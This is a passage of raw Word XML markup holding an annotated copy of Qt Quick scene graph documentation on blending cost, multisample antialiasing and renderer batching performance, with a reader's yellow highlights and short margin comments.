          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidRPr="008455FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low-end hardware blending</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also </w:t>
      </w:r>
      <w:r w:rsidRPr="008455FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be quite expensive</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so </w:t>
      </w:r>
      <w:r w:rsidRPr="008455FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for an image or rounded rectangle that covers most of the screen, the amount of blending needed for the interior of these primitives can result in significant performance loss as the entire primitive must be blended</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008455FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC420B" w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="008455FB" w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Important example of performance problems.</w:t>
      </w:r>
      <w:r w:rsidR="00BC420B" w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00BC420B">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1730" w:name="multisample-antialiasing"/>
      <w:bookmarkStart w:id="1731" w:name="_Toc483000905"/>
      <w:bookmarkStart w:id="1732" w:name="_Toc483003896"/>
      <w:bookmarkStart w:id="1733" w:name="_Toc483604249"/>
      <w:bookmarkStart w:id="1734" w:name="_Toc483605469"/>
      <w:bookmarkEnd w:id="1730"/>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multisample Antialiasing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1731"/>
      <w:bookmarkEnd w:id="1732"/>
      <w:bookmarkEnd w:id="1733"/>
      <w:bookmarkEnd w:id="1734"/>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376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multisample antialiasing is a hardware feature where the hardware calculates a coverage value per pixel in the primitive</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some hardware can multisample at a very low cost, while other hardware may need both more memory and more GPU cycles to render a frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00376591" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using multisample antialiasing, many primitives, such as rounded rectangles and image elements can be antialiased and still be</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>opaque</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means the </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renderer has an easier job when creating batches</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can rely on early-z to avoid overdraw</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu</w:t>
      </w:r>
      <w:r w:rsidR="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00376591" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">multisample antialiasing is used, content rendered into framebuffer objects, need additional </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to support multisampling of framebuffers</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Typically</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_EXT_framebuffer_multisample</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_EXT_framebuffer_blit</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Most </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>desktop chips</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> have these extensions present, but they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">less common in embedded </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chips</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When framebuffer multisampling is not available in the hardware, content rendered into framebuffer objects will not be antialiased, including the content of a</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2080" w:history="1">
        <w:r w:rsidRPr="00376591">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffectSource</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// important concept for embedded devices //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00BC420B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1735" w:name="performance"/>
      <w:bookmarkStart w:id="1736" w:name="_Toc483000906"/>
      <w:bookmarkStart w:id="1737" w:name="_Toc483003897"/>
      <w:bookmarkStart w:id="1738" w:name="_Toc483604250"/>
      <w:bookmarkStart w:id="1739" w:name="_Toc483605470"/>
      <w:bookmarkEnd w:id="1735"/>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1736"/>
      <w:bookmarkEnd w:id="1737"/>
      <w:bookmarkEnd w:id="1738"/>
      <w:bookmarkEnd w:id="1739"/>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815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As stated in the beginning, </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>understanding the finer details of the renderer is not required to get good performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>It is written to optimize for common use cases and will perform quite well under almost any circumstance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Good performance comes from </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>effective batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, with as little as possible of the geometry being uploaded again and again. By setting the environment variable</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDERER_DEBUG=render</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the renderer </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will output statistics on how well the batching goes</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, how many batches, which batches are retained and which are opaque and not. When striving for optimal performance, </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uploads should happen only when really needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ba</w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tches should be fewer than 10 and at least 3-4 of them should be opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The default renderer do</w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">es not do any </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU-side viewport clipping</w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nor </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
